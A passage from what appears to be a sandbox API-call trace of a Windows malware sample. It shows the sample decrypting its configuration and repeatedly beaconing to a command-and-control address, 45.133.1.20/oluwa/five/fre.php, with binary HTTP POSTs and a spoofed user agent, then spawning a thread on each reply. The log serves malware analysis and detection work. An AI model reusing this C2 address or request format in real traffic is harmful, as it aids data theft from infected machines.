returned 0x74810000 [0163.082] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0163.097] GetProcessHeap () returned 0x6a0000 [0163.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0163.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.109] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0163.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.117] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0163.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.118] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0163.118] GetProcessHeap () returned 0x6a0000 [0163.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0163.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.120] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0163.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.122] CryptDestroyKey (hKey=0x6ad020) returned 1 [0163.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.124] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0163.124] GetProcessHeap () returned 0x6a0000 [0163.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0163.125] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.125] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0163.127] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.127] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0163.128] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.129] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0163.131] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.132] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0163.132] GetProcessHeap () returned 0x6a0000 [0163.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0163.132] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9b18*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0163.132] GetProcessHeap () returned 0x6a0000 [0163.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0163.132] socket (af=2, type=1, protocol=6) returned 0x2d4 [0163.133] connect (s=0x2d4, name=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0163.158] FreeAddrInfoW (pAddrInfo=0x6b9b18*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0163.158] GetProcessHeap () returned 0x6a0000 [0163.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0163.158] GetProcessHeap () returned 0x6a0000 [0163.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0163.159] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0163.160] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0163.160] GetProcessHeap () returned 0x6a0000 [0163.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0163.160] GetProcessHeap () returned 0x6a0000 [0163.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0163.161] GetProcessHeap () returned 0x6a0000 [0163.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0163.161] GetProcessHeap () returned 0x6a0000 [0163.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0163.162] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0163.163] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0163.163] GetProcessHeap () returned 0x6a0000 [0163.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0163.163] GetProcessHeap () returned 0x6a0000 [0163.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0163.164] send (s=0x2d4, buf=0x6bbd20*, len=242, flags=0) returned 242 [0163.164] send (s=0x2d4, buf=0x6bb998*, len=159, flags=0) returned 159 [0163.164] GetProcessHeap () returned 0x6a0000 [0163.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0163.164] recv (in: s=0x2d4, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0163.243] GetProcessHeap () returned 0x6a0000 [0163.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0163.244] GetProcessHeap () returned 0x6a0000 [0163.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0163.244] GetProcessHeap () returned 0x6a0000 [0163.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0163.244] GetProcessHeap () returned 0x6a0000 [0163.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0163.245] closesocket (s=0x2d4) returned 0 [0163.245] GetProcessHeap () returned 0x6a0000 [0163.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0163.245] GetProcessHeap () returned 0x6a0000 [0163.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0163.246] GetProcessHeap () returned 0x6a0000 [0163.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0163.246] GetProcessHeap () returned 0x6a0000 [0163.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0163.247] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1310) returned 0x2d4 [0163.249] Sleep (dwMilliseconds=0xea60) [0163.250] GetProcessHeap () returned 0x6a0000 [0163.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0163.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.251] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0163.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.295] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0163.308] GetProcessHeap () returned 0x6a0000 [0163.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0163.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.309] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0163.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.311] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0163.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.312] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0163.312] GetProcessHeap () returned 0x6a0000 [0163.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0163.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.314] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0163.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.314] CryptDestroyKey (hKey=0x6ad020) returned 1 [0163.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.315] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0163.315] GetProcessHeap () returned 0x6a0000 [0163.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0163.316] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.317] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0163.317] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.318] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0163.320] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.321] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0163.321] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.322] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0163.322] GetProcessHeap () returned 0x6a0000 [0163.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0163.322] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0163.322] GetProcessHeap () returned 0x6a0000 [0163.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0163.322] GetProcessHeap () returned 0x6a0000 [0163.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0163.323] GetProcessHeap () returned 0x6a0000 [0163.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0163.323] GetProcessHeap () returned 0x6a0000 [0163.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0163.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.324] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0163.329] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.331] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0163.339] GetProcessHeap () returned 0x6a0000 [0163.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0163.340] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.340] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0163.343] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.343] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0163.344] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.344] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0163.344] GetProcessHeap () returned 0x6a0000 [0163.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0163.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.345] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0163.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.346] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0163.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.347] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0163.347] GetProcessHeap () returned 0x6a0000 [0163.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0163.348] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.348] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0163.349] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.349] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0163.350] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.350] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0163.351] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.351] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0163.351] GetProcessHeap () returned 0x6a0000 [0163.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0163.351] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9be0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0163.351] GetProcessHeap () returned 0x6a0000 [0163.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab10 [0163.351] socket (af=2, type=1, protocol=6) returned 0x2d8 [0163.352] connect (s=0x2d8, name=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0163.378] FreeAddrInfoW (pAddrInfo=0x6b9be0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0163.378] GetProcessHeap () returned 0x6a0000 [0163.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0163.378] GetProcessHeap () returned 0x6a0000 [0163.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0163.379] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0163.380] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0163.380] GetProcessHeap () returned 0x6a0000 [0163.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0163.380] GetProcessHeap () returned 0x6a0000 [0163.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0163.381] GetProcessHeap () returned 0x6a0000 [0163.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0163.381] GetProcessHeap () returned 0x6a0000 [0163.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0163.382] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0163.390] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0163.390] GetProcessHeap () returned 0x6a0000 [0163.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0163.390] GetProcessHeap () returned 0x6a0000 [0163.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0163.391] send (s=0x2d8, buf=0x6bbd20*, len=242, flags=0) returned 242 [0163.391] send (s=0x2d8, buf=0x6bb998*, len=159, flags=0) returned 159 [0163.392] GetProcessHeap () returned 0x6a0000 [0163.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0163.392] recv (in: s=0x2d8, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0163.474] GetProcessHeap () returned 0x6a0000 [0163.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0163.477] GetProcessHeap () returned 0x6a0000 [0163.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0163.477] GetProcessHeap () returned 0x6a0000 [0163.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0163.477] GetProcessHeap () returned 0x6a0000 [0163.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0163.478] closesocket (s=0x2d8) returned 0 [0163.479] GetProcessHeap () returned 0x6a0000 [0163.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab10 | out: hHeap=0x6a0000) returned 1 [0163.479] GetProcessHeap () returned 0x6a0000 [0163.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0163.480] GetProcessHeap () returned 0x6a0000 [0163.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0163.480] GetProcessHeap () returned 0x6a0000 [0163.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0163.539] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1354) returned 0x2d8 [0163.542] Sleep (dwMilliseconds=0xea60) [0163.545] GetProcessHeap () returned 0x6a0000 [0163.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0163.545] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.546] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0163.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.560] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0163.568] GetProcessHeap () returned 0x6a0000 [0163.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0163.588] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.588] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0163.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.589] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0163.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.590] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0163.590] GetProcessHeap () returned 0x6a0000 [0163.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0163.591] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.591] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0163.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.592] CryptDestroyKey (hKey=0x6ad060) returned 1 [0163.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.595] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0163.595] GetProcessHeap () returned 0x6a0000 [0163.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0163.599] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.599] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0163.600] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.600] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0163.601] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.601] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0163.602] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.602] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0163.602] GetProcessHeap () returned 0x6a0000 [0163.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0163.603] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0163.603] GetProcessHeap () returned 0x6a0000 [0163.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0163.604] GetProcessHeap () returned 0x6a0000 [0163.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0163.604] GetProcessHeap () returned 0x6a0000 [0163.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0163.605] GetProcessHeap () returned 0x6a0000 [0163.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0163.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.606] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0163.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.614] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0163.626] GetProcessHeap () returned 0x6a0000 [0163.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0163.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.628] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0163.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.629] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0163.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.632] 